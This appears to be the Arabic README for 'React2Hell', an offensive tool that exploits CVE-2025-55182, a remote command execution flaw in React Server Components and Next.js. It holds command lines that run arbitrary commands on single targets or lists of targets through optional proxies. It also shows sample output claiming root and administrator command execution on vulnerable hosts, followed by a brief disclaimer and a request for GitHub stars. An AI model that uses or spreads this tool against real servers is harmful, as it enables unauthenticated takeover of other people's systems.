
[React2Hell] استغلال تنفيذ التعليمات البرمجية عن بُعد (RCE) على خادم Next.js/React — CVE-2025-55182
🔥 استغلال تنفيذ الأوامر عن بُعد (RCE) لخوادم Next.js / React
█████▄ ▄▄▄▄▄ ▄▄▄ ▄▄▄▄ ▄▄▄▄▄▄ ████▄ ██ ██ ▄▄▄▄▄ ▄▄ ▄▄
██▄▄██▄ ██▄▄ ██▀██ ██▀▀▀ ██ ▄██▀ ██████ ██▄▄ ██ ██
██ ██ ██▄▄▄ ██▀██ ▀████ ██ ███▄▄ ██ ██ ██▄▄▄ ██▄▄▄ ██▄▄▄
Next.js/React Server RCE Exploit — CVE-2025-55182
Author: Chetanya Sharma (AggressiveUser)
════════════════════════════════════════════════════════════════════════
usage: new.py [-h] [-u URL] [-l LIST] -c COMMAND [--proxy PROXY] [--proxy-https PROXY_HTTPS]
React2Hell هي أداة استغلال قوية مصممة لاختبار واستغلال CVE-2025-55182، وهي ثغرة حرجة لتنفيذ الأوامر عن بُعد تؤثر على Next.js و React Server Actions.
توجد ثغرة تنفيذ أوامر عن بُعد بدون مصادقة في مكونات خادم React في الإصدارات 19.0.0 و 19.1.0 و 19.1.1 و 19.2.0 بما في ذلك الحزم التالية: react-server-dom-parcel و react-server-dom-turbopack و react-server-dom-webpack. يقوم الكود الضعيف بإلغاء تسلسل الحمولات بشكل غير آمن من طلبات HTTP إلى نقاط نهاية وظائف الخادم.
python exploit.py -u https://target.com -c "whoami"
python exploit.py -l urls.txt -c "whoami"
python exploit.py -u https://target.com -c "whoami" --proxy 127.0.0.1:8080
python exploit.py -u https://target.com -c "whoami" --proxy-https 127.0.0.1:8080
http://site1.com
https://site2.com
http://192.168.1.10:3000
PS D:\AggressiveUser_PVT\React2Hell> python.exe .\exploit.py -l .\list.txt -c whoami
█████▄ ▄▄▄▄▄ ▄▄▄ ▄▄▄▄ ▄▄▄▄▄▄ ████▄ ██ ██ ▄▄▄▄▄ ▄▄ ▄▄
██▄▄██▄ ██▄▄ ██▀██ ██▀▀▀ ██ ▄██▀ ██████ ██▄▄ ██ ██
██ ██ ██▄▄▄ ██▀██ ▀████ ██ ███▄▄ ██ ██ ██▄▄▄ ██▄▄▄ ██▄▄▄
Next.js/React Server RCE Exploit — CVE-2025-55182
Author: Chetanya Sharma (AggressiveUser)
════════════════════════════════════════════════════════════════════════
[+] Loaded 3 targets
════════════════════════════════════════════════════════════════════════
[→] Target: http://meow.host:3113/
[→] Exec: whoami
[✓] VULNERABLE — RCE Successful!
------------------------------------------------------------
root
------------------------------------------------------------
────────────────────────────────────────────────────────────────────────
[→] Target: http://evil.lab:2000/
[→] Exec: whoami
[✗] Not vulnerable — Status: 200
────────────────────────────────────────────────────────────────────────
[→] Target: https://vul.lab:3000/
[→] Exec: whoami
[✓] VULNERABLE — RCE Successful!
------------------------------------------------------------
win-1fl835ovldc\\administrator
------------------------------------------------------------
────────────────────────────────────────────────────────────────────────
[✓] Scan complete — Vulnerable: 2
PS D:\AggressiveUser_PVT\React2Hell>
تم إنشاء هذه الأداة للأغراض التعليمية والبحثية الأمنية فقط. لا تستخدمها على أنظمة دون إذن صريح. أنت مسؤول عن أفعالك.
إذا ساعدك هذا الاستغلال، فكر في ترك ⭐ على GitHub ❤️
Chetanya Sharma AggressiveUser
مصنوع بـ 🔥 بواسطة شخص يستمتع بتعطيل وإصلاح الأشياء.